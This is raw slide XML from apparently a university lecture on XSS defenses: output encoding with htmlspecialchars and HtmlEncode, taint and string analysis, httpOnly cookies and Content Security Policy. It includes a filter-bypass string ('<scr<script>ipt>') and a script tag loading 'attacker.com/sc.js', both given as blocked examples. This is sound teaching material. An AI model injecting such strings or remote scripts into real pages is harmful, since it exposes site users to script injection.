              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>;	&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:sym typeface="Symbol" pitchFamily="18" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="100000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	     "&lt;a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='test'&gt;Test&lt;/a&gt;",   ENT_QUOTES); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="Times"/>
              <a:buNone/>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>	Outputs:  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>        &amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>lt;a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>=&amp;#039;test&amp;#039;&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>gt;Test&amp;lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>a&amp;gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ASP.NET 1.1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>Server.HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(string) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:spcBef>
                <a:spcPct val="60000"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Similar to PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>htmlspecialchars</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="009900"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:tabLst>
                <a:tab pos="974725" algn="l"/>
                <a:tab pos="3200400" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/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encoding functions</a:t>
            </a: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2600325" y="6291263"/>
            <a:ext cx="37893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See http://us3.php.net/htmlspecialchars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Existing Server-side Prevention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62783" y="2286478"/>
            <a:ext cx="1371457" cy="83770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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Escaping Filtering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4130102" y="1143241"/>
            <a:ext cx="1035386" cy="609631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eaLnBrk="0" hangingPunct="0"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Vulnerable code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4130102" y="3657791"/>
            <a:ext cx="1035386" cy="609632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eaLnBrk="0" hangingPunct="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Patched</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="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716" y="4953080"/>
            <a:ext cx="1371457" cy="83770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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Taint</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Analysis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38578" y="4953080"/>
            <a:ext cx="1371457" cy="83770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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>String Analysis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43458" y="4877055"/>
            <a:ext cx="1904881" cy="83770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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Instruction Randomization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Cloud 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6994574" y="685658"/>
            <a:ext cx="2454036" cy="1450207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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Programmer Attention Required!!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4418982" y="1828896"/>
            <a:ext cx="381835" cy="457582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457595" y="3193038"/>
            <a:ext cx="380404" cy="457583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eaLnBrk="0" hangingPunct="0">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US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971729" y="4227260"/>
            <a:ext cx="1676066" cy="7258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>
            <a:off x="4647796" y="4227260"/>
            <a:ext cx="77225" cy="7258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ent Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4373523" y="2087255"/>
            <a:ext cx="3581766" cy="1997837"/>
          </a:xfrm>
          <a:prstGeom prst="bentArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7555"/>
              <a:gd name="adj2" fmla="val 9735"/>
              <a:gd name="adj3" fmla="val 12643"/>
              <a:gd name="adj4" fmla="val 5392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owchart: Document 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6325292" y="6248368"/>
            <a:ext cx="1392908" cy="609632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eaLnBrk="0" hangingPunct="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Randomized</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="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code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295664" y="5879720"/>
            <a:ext cx="2731473" cy="984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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>WebSSARI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>, Huang et al. [2004]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Pixy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Jovanovic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> et al. [2006]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Xie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> and Aiken [2006]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>…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988524" y="5911279"/>
            <a:ext cx="2336768" cy="95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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Mimamide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> [2005]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Balzarotti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> [2008]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Wasermann</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> et al. [2008]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>…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19017" y="2135863"/>
            <a:ext cx="3848374" cy="92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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>preg_replace</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	("script", "",input)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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25619" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1444392" y="3824185"/>
            <a:ext cx="71044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lvl="1" eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t> 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01537" y="4164144"/>
            <a:ext cx="42915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0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&lt;scr</a:t>
            </a:r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script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ipt&gt;” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“&lt;script&gt;”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1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2097943" y="3824185"/>
            <a:ext cx="1984966" cy="289754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778668" y="3517217"/>
            <a:ext cx="103104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0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Release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17941" y="3325340"/>
            <a:ext cx="646331" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91432" tIns="45716" rIns="91432" bIns="45716">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0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295663" y="5192629"/>
            <a:ext cx="64632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0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>……</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2562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124748" y="6248369"/>
            <a:ext cx="2894504" cy="457583"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="914962"/>
            <a:fld id="{EB69DB10-FCFB-476B-9BFC-E9B4964D7CCB}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr algn="ctr" defTabSz="914962"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Down Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6781491" y="5823779"/>
            <a:ext cx="381835" cy="272541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269152" y="5790786"/>
            <a:ext cx="217945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eaLnBrk="0" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Boyd et al. [2004]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27" grpId="0" animBg="1"/>
      <p:bldP spid="28" grpId="0"/>
      <p:bldP spid="29" grpId="0"/>
      <p:bldP spid="30" grpId="0"/>
      <p:bldP spid="32" grpId="0"/>
      <p:bldP spid="33" grpId="0" animBg="1"/>
      <p:bldP spid="35" grpId="0"/>
      <p:bldP spid="36" grpId="0"/>
      <p:bldP spid="26" grpId="0" animBg="1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 -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sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>httpOnly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cookies </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Security Policy HTML5 (CSP)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7187"/>
            <a:ext cx="9144000" cy="4719268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dirty="0" smtClean="0"/>
              <a:t>23/09   Introduction to Web Programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>30/09   SOP and its Security Problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>07/10   Attacks and Defenses: CSRF, XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>14/10  CM/TP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>21/10  Research project presentations (3 x 40’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>28/10  Research project presentations (3 x 40’)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>04/11  TPs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18/11: Exam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550879" cy="826230"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Content Security Policy (CSP)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060848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sz="2800" dirty="0" smtClean="0"/>
              <a:t>New browser feature for mitigating XSS attacks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 smtClean="0"/>
              <a:t>Whitelists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>safe”scripts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> hosts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Content-Security-Policy HTTP  header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61178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Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src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267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="267435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-36512" y="2961232"/>
            <a:ext cx="9144000" cy="1331864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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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&lt;script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=“trusted.com/jquery.js”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&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=“/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/myscript.js”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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&lt;script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=“attacker.com/sc.js”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&gt;&lt;/script&gt;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0312" y="1750026"/>
            <a:ext cx="129614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80312" y="3442498"/>
            <a:ext cx="129614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-36512" y="4977456"/>
            <a:ext cx="9144000" cy="1331864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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refused to load the script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker.com/sc.js’ because it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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violates the following Content</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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Security Policy directive: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘self’ trusted.com”.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52320" y="5458722"/>
            <a:ext cx="136815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CONSOLE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CSP Example </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>inlined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61178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Content-Security-Policy:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> script-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>src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267435"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘self’ trusted.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="267435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-36512" y="2961232"/>
            <a:ext cx="9144000" cy="1331864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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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&lt;HTML&gt;..</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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chemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script&gt; alert(‘this is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code’&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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0312" y="1750026"/>
            <a:ext cx="129614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80312" y="3442498"/>
            <a:ext cx="129614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-36512" y="4977456"/>
            <a:ext cx="9144000" cy="1331864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100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Refused to load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>inlined</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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violates the following Content</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="20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Security Policy directive: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342100" marR="0" lvl="0" indent="-342100" algn="l" defTabSz="91464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baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="0" noProof="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ‘self’ truste.com”.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52320" y="5458722"/>
            <a:ext cx="136815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CONSOLE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Inline event handlers are inline scripts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577" y="1340768"/>
            <a:ext cx="8649189" cy="4719268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&lt;button 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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>= “…”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en-US" dirty="0" smtClean="0"/>
              <a:t> Buy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
